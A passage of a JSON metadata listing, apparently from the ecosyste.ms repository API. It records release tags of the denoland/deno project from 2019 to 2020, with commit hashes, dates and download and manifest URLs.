s/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https: